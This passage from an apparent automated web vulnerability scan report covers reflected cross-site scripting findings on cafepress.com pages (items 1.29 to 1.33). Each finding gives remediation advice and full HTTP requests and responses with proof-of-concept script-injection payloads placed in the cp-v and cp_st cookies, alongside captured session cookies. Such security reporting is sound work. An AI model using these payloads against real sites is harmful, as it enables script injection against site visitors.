The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d05a"-alert(1)-"a640bcdbb5e was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+coasters HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA9d05a"-alert(1)-"a640bcdbb5e ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 59298 Date: Sun, 26 Dec 2010 13:48:59 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:59 GMT; path=/ Set-Cookie: cp_sc=100176; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:59 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59298 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA9d05a"-alert(1)-"a640bcdbb5e "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.29. http://www.cafepress.com/+coasters [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+coasters
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47b5e</script><script>alert(1)</script>c56a41dcd4d was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, encode every character outside [A-Za-z0-9] as a JavaScript escape (\xHH or \uHHHH) before writing it into the single-quoted literal; that also closes the </script> breakout shown here, because the HTML parser never sees a literal "<". HTML entity encoding is not the right encoder for this context: the HTML parser does not decode entities inside a script element. Note that the cookie is issued with domain=cafepress.com, so any host under that domain that can set a cookie can supply the cp_st value seen by www.cafepress.com.
Request
GET /+coasters HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=47b5e</script><script>alert(1)</script>c56a41dcd4d ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW20 Cteonnt-Length: 59305 Date: Sun, 26 Dec 2010 13:48:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/ Set-Cookie: cp_sc=100176; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59305 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '47b5e</script><script>alert(1)</script>c56a41dcd4d ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.30. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536 [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+eat_sleep_game_light_tshirt,299007536
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbfc3"-alert(1)-"de6154bb2da was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, encode every character outside [A-Za-z0-9] as a JavaScript escape (\xHH or \uHHHH) before it is written into the double-quoted literal assigned to s.eVar30; the "-alert(1)-" payload then stays inside the string instead of closing it and leaving an expression between two literals. Note that the cookie is issued with domain=cafepress.com, so any host under that domain that can set a cookie can supply the cp-v value seen by www.cafepress.com.
Request
GET /+eat_sleep_game_light_tshirt,299007536 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAbbfc3"-alert(1)-"de6154bb2da ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 93266 Date: Sun, 26 Dec 2010 13:49:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=801deb16c59ee3f96b4c4bec; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:57 GMT; path=/ Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:57 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 93266 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAbbfc3"-alert(1)-"de6154bb2da "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.31. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536 [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+eat_sleep_game_light_tshirt,299007536
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58edd</script><script>alert(1)</script>b17bfa61193 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, encode every character outside [A-Za-z0-9] as a JavaScript escape (\xHH or \uHHHH) before writing it into the single-quoted literal; that also closes the </script> breakout shown here, because the HTML parser never sees a literal "<". HTML entity encoding is not the right encoder for this context: the HTML parser does not decode entities inside a script element.
Request
GET /+eat_sleep_game_light_tshirt,299007536 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=58edd</script><script>alert(1)</script>b17bfa61193 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW20 Cteonnt-Length: 93292 Date: Sun, 26 Dec 2010 13:49:54 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=801deb16c59ee3f96b4c4bec; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:54 GMT; path=/ Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:54 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 93292 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'ProductDetails' window.cafepress.tealeaf.searchTerm = '58edd</script><script>alert(1)</script>b17bfa61193 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.32. http://www.cafepress.com/+framed-prints [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+framed-prints
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4dfd"-alert(1)-"012c3a7120a was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, encode every character outside [A-Za-z0-9] as a JavaScript escape (\xHH or \uHHHH) before it is written into the double-quoted literal assigned to s.eVar30; the "-alert(1)-" payload then stays inside the string instead of closing it and leaving an expression between two literals.
Request
GET /+framed-prints HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAd4dfd"-alert(1)-"012c3a7120a ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 63755 Date: Sun, 26 Dec 2010 13:48:46 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:46 GMT; path=/ Set-Cookie: cp_sc=100169; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:46 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 63755 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAd4dfd"-alert(1)-"012c3a7120a "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.33. http://www.cafepress.com/+framed-prints [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+framed-prints
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93d2c</script><script>alert(1)</script>063b6447c14 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, encode every character outside [A-Za-z0-9] as a JavaScript escape (\xHH or \uHHHH) before writing it into the single-quoted literal; that also closes the </script> breakout shown here, because the HTML parser never sees a literal "<". HTML entity encoding is not the right encoder for this context: the HTML parser does not decode entities inside a script element.
Request
